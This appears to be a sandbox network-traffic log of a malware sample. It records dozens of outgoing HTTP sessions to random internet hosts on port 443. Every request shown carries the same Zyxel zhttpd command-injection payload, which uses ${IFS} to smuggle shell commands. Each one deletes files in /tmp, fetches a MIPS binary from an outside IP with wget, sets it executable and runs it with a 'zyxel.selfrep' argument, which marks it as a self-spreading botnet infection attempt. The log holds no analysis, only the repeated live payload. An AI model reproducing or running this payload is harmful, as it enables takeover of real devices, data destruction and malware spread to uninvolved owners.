                                        Mar 31, 2024 09:21:34.037488937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5344192.168.2.2340388148.240.113.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037549019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5345192.168.2.2340648110.58.99.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037581921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5346192.168.2.2349852153.52.126.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037656069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5347192.168.2.23364302.151.140.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037692070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5348192.168.2.2335112173.144.37.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037741899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5349192.168.2.235575845.175.98.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037777901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5350192.168.2.235139892.117.10.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037827015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5351192.168.2.234842042.57.95.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037874937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5352192.168.2.2343078131.111.201.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037923098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5353192.168.2.234816073.242.76.153443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.037992954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5354192.168.2.2342286137.107.43.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038029909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5355192.168.2.2339640145.83.217.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038089991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5356192.168.2.235986231.92.82.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038130999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5357192.168.2.2355704208.97.107.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038182974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5358192.168.2.234052284.47.113.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038238049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5359192.168.2.2338852158.33.73.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038286924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5360192.168.2.233637653.245.154.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038340092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5361192.168.2.233953440.134.176.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038367987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5362192.168.2.2355112204.98.121.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038424969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5363192.168.2.2339728195.90.162.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038464069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5364192.168.2.2356644130.85.149.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038527012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5365192.168.2.235547462.214.11.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038574934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5366192.168.2.2339542200.48.137.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038634062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5367192.168.2.2356078126.116.156.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038671970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5368192.168.2.2348170185.189.198.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038717031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5369192.168.2.23400964.45.171.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038777113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5370192.168.2.2352592178.5.239.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038819075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5371192.168.2.233784013.93.126.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038862944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5372192.168.2.2351208129.164.15.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038902998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5373192.168.2.2344200187.225.150.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038934946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5374192.168.2.234358874.29.35.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.038970947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5375192.168.2.233806470.225.62.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039031029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5376192.168.2.235928094.226.241.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039071083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5377192.168.2.235574013.180.47.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039103031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5378192.168.2.235355279.3.221.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039165974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5379192.168.2.2333582101.69.251.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039216042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5380192.168.2.2342776185.133.43.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039267063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5381192.168.2.234157213.236.234.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039309978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5382192.168.2.2342462185.127.185.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039390087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5383192.168.2.2355722223.173.64.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039433002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5384192.168.2.23554504.225.47.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039489985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5385192.168.2.2355724129.122.137.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039537907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5386192.168.2.2337158193.79.202.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039586067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5387192.168.2.23469645.93.167.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039628029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5388192.168.2.2336800158.162.236.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039680958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5389192.168.2.2357136138.117.217.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039726973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5390192.168.2.234060278.217.247.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039779902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5391192.168.2.2340526200.57.95.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039814949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5392192.168.2.2347226136.70.119.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039875031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5393192.168.2.2345068177.159.18.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039930105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5394192.168.2.2350964123.234.47.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.039969921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5395192.168.2.234819453.81.201.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040023088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5396192.168.2.2359430203.128.128.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040074110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5397192.168.2.2339676131.61.124.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040105104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5398192.168.2.2342710213.152.95.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040160894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5399192.168.2.2334360194.104.24.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040195942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5400192.168.2.234904886.209.39.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040232897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5401192.168.2.233414227.46.40.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040282011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5402192.168.2.235982076.200.111.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040324926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5403192.168.2.234658472.235.255.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040373087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5404192.168.2.235207032.245.234.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040416002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5405192.168.2.2333638142.135.84.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040466070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5406192.168.2.235135649.247.125.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040517092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5407192.168.2.2345982141.204.179.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040563107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5408192.168.2.2357972206.168.139.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040605068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5409192.168.2.2358160178.80.201.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040653944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5410192.168.2.234452291.231.94.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:34.040693998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5411192.168.2.234077457.28.208.116443
                                        TimestampBytes transferredDirectionData
